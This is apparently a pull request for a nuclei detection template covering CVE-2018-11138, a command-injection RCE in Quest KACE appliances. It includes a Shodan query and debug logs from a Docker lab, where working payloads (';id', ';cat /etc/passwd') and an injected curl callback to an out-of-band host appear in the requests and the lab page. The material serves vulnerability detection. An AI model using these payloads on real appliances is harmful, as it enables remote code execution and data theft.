Template / PR Information

• Added CVE-2018-11138 - Quest KACE System Management Appliance RCE
• References:
  • https://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities
  • https://www.exploit-db.com/exploits/44950/
  • https://nvd.nist.gov/vuln/detail/CVE-2018-11138

Template Validation

I’ve validated this template locally?

• YES
• NO

Shodan Query: http.title:"kace systems management"

Docker Environment: Complete vulnerable environment provided in code/cves/2018/CVE-2018-11138/

Template Validation Output:

nuclei -u http://localhost:8080 -t http/cves/2018/CVE-2018-11138.yaml -debug

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.5

                projectdiscovery.io

[INF] Current nuclei version: v3.4.5 (latest)
[INF] Current nuclei-templates version: v10.2.3 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 105
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [CVE-2018-11138] Dumped HTTP request for http://localhost:8080

GET / HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Connection: close
Accept-Encoding: gzip

[DBG] [CVE-2018-11138] Dumped HTTP response http://localhost:8080

HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset=utf-8
Date: Thu, 26 Jun 2025 06:42:36 GMT
Server: Apache/2.4.54 (Debian)
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.33

<!DOCTYPE html>
<html>
<head>
    <title>Quest KACE System Management Appliance</title>
    <style>
        body { font-family: Arial, sans-serif; margin: 40px; background-color: #f5f5f5; }
        .container { max-width: 800px; margin: 0 auto; background: white; padding: 30px; border-radius: 8px; box-shadow: 0 2px 10px rgba(0,0,0,0.1); }
        .header { background: #f0f0f0; padding: 20px; border-radius: 5px; margin-bottom: 20px; }
        .warning { background: #fff3cd; border: 1px solid #ffeaa7; padding: 15px; border-radius: 5px; margin: 20px 0; }
        .endpoint { background: #e9ecef; padding: 10px; border-radius: 3px; font-family: monospace; margin: 5px 0; }
        .test-form { background: #f8f9fa; padding: 20px; border-radius: 5px; margin: 20px 0; }
        .test-form input[type="text"] { width: 100%; padding: 8px; margin: 5px 0; border: 1px solid #ddd; border-radius: 3px; }
        .test-form input[type="submit"] { background: #007bff; color: white; padding: 10px 20px; border: none; border-radius: 3px; cursor: pointer; }
        .test-form input[type="submit"]:hover { background: #0056b3; }
        .info-box { background: #d1ecf1; border: 1px solid #bee5eb; padding: 15px; border-radius: 5px; margin: 20px 0; }
    </style>
</head>
<body>
    <div class="container">
        <div class="header">
            <h1>Quest KACE System Management Appliance</h1>
            <p><strong>Version:</strong> 8.0.318 (Vulnerable)</p>
            <p><strong>Status:</strong> Running</p>
            <p><strong>Build Date:</strong> January 15, 2024</p>
        </div>
        
        <div class="warning">
            <h3>⚠️ Security Warning</h3>
            <p>This is a <strong>vulnerable test environment</strong> for CVE-2018-11138.</p>
            <p><strong>Do not use in production or expose to the internet.</strong></p>
            <p>This application is designed for educational and authorized security testing purposes only.</p>
        </div>
        
        <div class="info-box">
            <h3>📋 Vulnerability Information</h3>
            <p><strong>CVE:</strong> CVE-2018-11138</p>
            <p><strong>Severity:</strong> Critical (CVSS 9.8)</p>
            <p><strong>Type:</strong> Remote Code Execution (RCE)</p>
            <p><strong>Vector:</strong> Command injection in <code>/common/download_agent_installer.php</code></p>
        </div>
        
        <h2>🔧 Available Endpoints</h2>
        <ul>
            <li><span class="endpoint">/common/download_agent_installer.php</span> - Vulnerable RCE endpoint</li>
            <li><span class="endpoint">/admin/</span> - Administration panel (not implemented)</li>
            <li><span class="endpoint">/api/</span> - API endpoints (not implemented)</li>
        </ul>
        
        <h2>🧪 Test the Vulnerability</h2>
        <div class="test-form">
            <h3>Manual Test Form</h3>
            <form method="POST" action="/common/download_agent_installer.php">
                <label>Platform:</label>
                <input type="text" name="platform" value="linux" required>
                
                <label>Custom Install Options (Command Injection):</label>
                <input type="text" name="custom_install_options" placeholder=";id;echo+" required>
                
                <input type="submit" value="Test Vulnerability">
            </form>
        </div>
        
        <h2>💻 Command Line Testing</h2>
        <p>Use the following commands to test the RCE vulnerability:</p>
        
        <h3>Basic Command Execution:</h3>
        <div class="endpoint">
            curl -X POST http://localhost/common/download_agent_installer.php \
              -H "Content-Type: application/x-www-form-urlencoded" \
              -d "platform=linux&custom_install_options=;id;echo+"
        </div>
        
        <h3>File Read:</h3>
        <div class="endpoint">
            curl -X POST http://localhost/common/download_agent_installer.php \
              -H "Content-Type: application/x-www-form-urlencoded" \
              -d "platform=linux&custom_install_options=;cat+/etc/passwd;echo+"
        </div>
        
        <h3>Network Reconnaissance:</h3>
        <div class="endpoint">
            curl -X POST http://localhost/common/download_agent_installer.php \
              -H "Content-Type: application/x-www-form-urlencoded" \
              -d "platform=linux&custom_install_options=;netstat+-an;echo+"
        </div>
        
        <h2>🔍 Nuclei Template Testing</h2>
        <p>Test with the Nuclei template:</p>
        <div class="endpoint">
            nuclei -u http://localhost -t http/cves/2018/CVE-2018-11138.yaml -debug
        </div>
        
        <h2>📚 References</h2>
        <ul>
            <li><a href="https://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities" target="_blank">Core Security Advisory</a></li>
            <li><a href="https://www.exploit-db.com/exploits/44950/" target="_blank">Exploit-DB</a></li>
            <li><a href="https://nvd.nist.gov/vuln/detail/CVE-2018-11138" target="_blank">NVD</a></li>
            <li><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11138" target="_blank">CVE Details</a></li>
        </ul>
        
        <div class="warning">
            <h3>🔒 Disclaimer</h3>
            <p>This application is provided for educational and authorized security testing purposes only. 
            Always ensure you have proper authorization before testing any systems.</p>
        </div>
    </div>
</body>
</html> 
[INF] Using Interactsh Server: oast.online
[INF] [CVE-2018-11138] Dumped HTTP request for http://localhost:8080/common/download_agent_installer.php

POST /common/download_agent_installer.php HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Connection: close
Content-Length: 102
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

platform=linux&custom_install_options=;curl+http://d1eenn53mhioq9auc7609uyxq7na54g13.oast.online;echo+
[DBG] [CVE-2018-11138] Dumped HTTP response http://localhost:8080/common/download_agent_installer.php

HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset=utf-8
Date: Thu, 26 Jun 2025 06:42:36 GMT
Server: Apache/2.4.54 (Debian)
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.33

<html><head><title>KACE Agent Installer</title></head><body><h1>Quest KACE System Management Appliance</h1><h2>Agent Installation</h2><p><strong>Platform:</strong> linux</p><p><strong>Install Options:</strong> ;curl http://d1eenn53mhioq9auc7609uyxq7na54g13.oast.online;echo </p><p><strong>Output:</strong></p><pre>Installing agent for platform: linux
&lt;html&gt;&lt;head&gt;&lt;/head&gt;&lt;body&gt;31g45an7qxyu9067cua9qoihm35nnee1d&lt;/body&gt;&lt;/html&gt;
</pre><p><em>Note: This is a vulnerable test environment for CVE-2018-11138</em></p></body></html> 
[d1eenn53mhioq9auc7609uyxq7na54g13] Received HTTP interaction from 49.207.225.8 at 2025-06-26 06:42:37
------------
HTTP Request
------------

GET / HTTP/1.1
Host: d1eenn53mhioq9auc7609uyxq7na54g13.oast.online
Accept: */*
User-Agent: curl/7.74.0




------------
HTTP Response
------------

HTTP/1.1 200 OK
Connection: close
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Content-Type, Authorization
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Server: oast.online
X-Interactsh-Version: 1.2.2

<html><head></head><body>31g45an7qxyu9067cua9qoihm35nnee1d</body></html>

[CVE-2018-11138:word-1] [http] [critical] http://localhost:8080/common/download_agent_installer.php
[INF] Scan completed in 5.945631875s. 1 matches found.

Command Injection Validation:

curl -X POST http://localhost:8080/common/download_agent_installer.php \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "platform=linux&custom_install_options=;id;echo+"

# Response shows command execution:
<pre>Installing agent for platform: linux
uid=33(www-data) gid=33(www-data) groups=33(www-data)
</pre>

Additional References:

• Nuclei Template Creation Guideline
• Nuclei Template Matcher Guideline
• Nuclei Template Contribution Guideline
• PD-Community Discord server

/claim #12468